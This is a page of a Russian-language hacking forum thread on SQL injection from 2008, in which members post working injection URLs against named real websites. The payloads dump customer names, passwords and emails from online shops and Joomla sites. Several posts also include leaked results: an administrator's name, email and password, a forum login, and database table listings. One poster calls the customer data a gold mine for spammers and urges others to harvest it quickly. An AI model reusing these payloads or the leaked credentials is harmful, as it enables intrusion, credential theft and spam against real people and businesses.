HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 487 из 1604 « Первая < 387437477 483 484 485 486 487 488 489 490 491 4975375879871487 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4861  
Старый 19.02.2008, 03:11
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
http://www.drawger.com/robd/?section=gallery&gallery_id=-633'+union+select+1,2,3,concat(version(),0x3a,user (),0x3a,database()),5/*
_____________________________
4.1.22-log:draw@localhost:drawger
_____________________________
таблички:
-633'%20union+select+1,2,3,4,5+from+contacts/*
-633'%20union+select+1,2,3,4,5+from+links/*
-633'%20union+select+1,2,3,4,5+from+users/*
____________________________
мыло zimm@drawger.com
=========================
http://www.flagstaff.co.nz/artists_detail.php?artists_id=-64'%20union+select+1,2,3,4,5,6,version(),8/*
=========================
4.0.27-standard-log
_______________________________
http://www.shinshy-records.com/subpages/artists_id.php?lang=es&myId=-2+union+select+1,2,3,password,5+from+users/*
странно 246061
____________________________
Последний раз редактировалось xcedz; 19.02.2008 в 04:45..
 
Ответить с цитированием

  #4862  
Старый 19.02.2008, 04:43
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
Хыы я для спамера просто золотая жила свежих мыльников вот вам собираем карочь базы огромные просто (не везде конечно но много в основном)
Код HTML:
http://www.amenbeads.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://kissedbyangels.com/oscommerce/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://www.chibabogu.com/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://www.dvbhardware.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://www.diggorypress.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://www.foreverpets.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Код HTML:
http://www.energysavingworld.co.uk/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

парсим пока тепленькие а то не успеите, остынут
Последний раз редактировалось satana8920; 19.02.2008 в 04:50..
 
Ответить с цитированием

  #4863  
Старый 19.02.2008, 11:28
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Mambo Component Material Suche 1.0
Код:
http://www.berufsvorbereitung-medien.org/index.php?option=com_materialsuche&Itemid=70&tsk=detail&id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),null,null,7,null,9,null,null,null,null,14,null,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
Сайтов с данной багой больше не нашел =/
 
Ответить с цитированием

  #4864  
Старый 19.02.2008, 11:47
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию
вообшем скуль
Код:
http://www.newspress.fr/index.asp?lang='+or+1
db_name: newspress
sys_user :newspress_user
version:Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)


имена таблиц :

Код:
'ACCESPRESSE','addr','ADFP_CAT_IDS','ADFP_QUA_IDS',
'Adresse_Web','ALERT_COMM','algorithm','APPNAME','ARCHIVEDON','ARGUS_CAT_IDS','ARGUS_TEM_IDS','auid','backuplsn','BEGINDATE','bin_data','binary_message_body','bit_data','bitlength','bitposint','bitposleaf','brkrinst','CARNET','CARTE_ID','CAT_ID','CAT_IDS','Categorie_Titre','CATID','CCLIC','CDAYS','CDISP','cert','Chaine','chk','USERS'
берем таблицу и подбираем имена столбцов (пример для таблицы лог):
Код:
http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='LOG'+AND+C OLU MN_NAME+NOT+IN+('addr','xxx',))--
найдя нужный столбец например addr выводим

Код:
http://www.newspress.fr/index.asp?lang='+or+1=(SELECT+TOP+1+addr+from+LOG)--
в поиске и использовании очень помогла статья [cash]
http://forum.antichat.ru/threadnav30501-1-10.html
Последний раз редактировалось MaSter GeN; 19.02.2008 в 11:54..
 
Ответить с цитированием

  #4865  
Старый 19.02.2008, 12:37
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Joomla Component Artist

Код:
http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
Три разных уязвимых параметра

Добавлено:
Код:
http://www.hanoiguesthouse.net/index.php?option=com_list&city=-1+union+select+1,2,3,concat(version()),5,6,7,8,9,10/*
Последний раз редактировалось it's my; 19.02.2008 в 12:59..
 
Ответить с цитированием

  #4866  
Старый 19.02.2008, 13:30
Lamersha
Новичок
Регистрация: 11.12.2007
Сообщений: 6
Провел на форуме:
162349

Репутация: 14
По умолчанию
http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=10080 '
 
Ответить с цитированием

  #4867  
Старый 19.02.2008, 15:24
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
По умолчанию
хостерЖ
elabhosting.com
Код:
http://www.elabhosting.com/subtopic.php?id=99999'+union+select+1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4+from+users+limit+1,1/*
Таблицы и поля, которые я подобрал:
Код HTML:
users
  email
  password
  first_name
  last_name
domains
server
  id
  name
А вот и адимн:

First Name: Wael
Last Name: Elkadi
pass: william
admin@elabhosting.com
 
Ответить с цитированием

  #4868  
Старый 19.02.2008, 15:31
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
По умолчанию
да, чуть не забыл =)
буржуйский онлайн-магазинчик (австралийский)

Код:
_http://www.australianopenshop.com/category.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,VERSION(),12/*
Версия мускула: 5.0.27-community-nt
Юзер: ausopen@netregis-8cuqdh
База: ausopen

смотрел таблицы, из достойных могу выделить только:
tblbilling
tblmember
tblorder
tblorderprod
tblsiteadmin
tbluser
 
Ответить с цитированием

  #4869  
Старый 19.02.2008, 19:19
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
moblog.co.uk
Цитата:
http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ ws(0x3a,username,password,email),4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9+from+mob_users+limit+5110,1/*
http://moblog.co.uk/forum
от форума
mat:bigmoney
 
Ответить с цитированием

  #4870  
Старый 19.02.2008, 21:09
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
Post
4.0.27-standard
Код HTML:
http://www.plantgeek.net/article_viewer.php?id=99999999999999+union+select+1,2,concat(version(),database(),user()),4,5,6,7,8,9,1,2,3/*
4.1.22-log
Код HTML:
http://www.valleys.ru/work.php?id=-9+union+select+1,2,database(),user(),5,6,version(),8,9--
4.1.20-max-log
Код HTML:
http://www.freepoc.org/viewapp.php?id=-1+union+select+1,version(),3,4,5,6,7,user()--
Код HTML:
http://www.rabidhardware.net/index.php?profile=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,TABLE_NAME,7,8,9,0,1,2,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES/*
Последний раз редактировалось Sleep; 19.02.2008 в 21:13..
 
Ответить с цитированием
Ответ
Страница 487 из 1604 « Первая < 387437477 483 484 485 486 487 488 489 490 491 4975375879871487 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ